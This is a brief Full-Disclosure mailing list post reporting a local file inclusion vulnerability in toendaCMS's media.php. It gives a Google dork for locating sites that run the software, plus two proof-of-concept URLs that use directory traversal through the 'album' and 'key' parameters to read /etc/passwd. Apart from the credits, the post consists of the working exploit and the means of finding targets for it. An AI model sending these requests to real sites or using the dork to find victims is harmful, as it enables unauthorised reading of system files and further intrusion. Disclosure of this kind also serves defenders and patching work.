Local File Include in  toendaCMS.

Vulnerable File : media.php

googleDork: "Powered by  toendaCMS "

PoC:
 

http://site.com/media.php?album=1005bb&key=../../../../../../../../../../../../../etc/passwd

 or 

http://site.com/ media.php?album=../../../../../../../../../../../../..&key=/etc/passwd

_____

Found By MoHaJaLi

Greetz to Eddy_BAck0o

_____


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/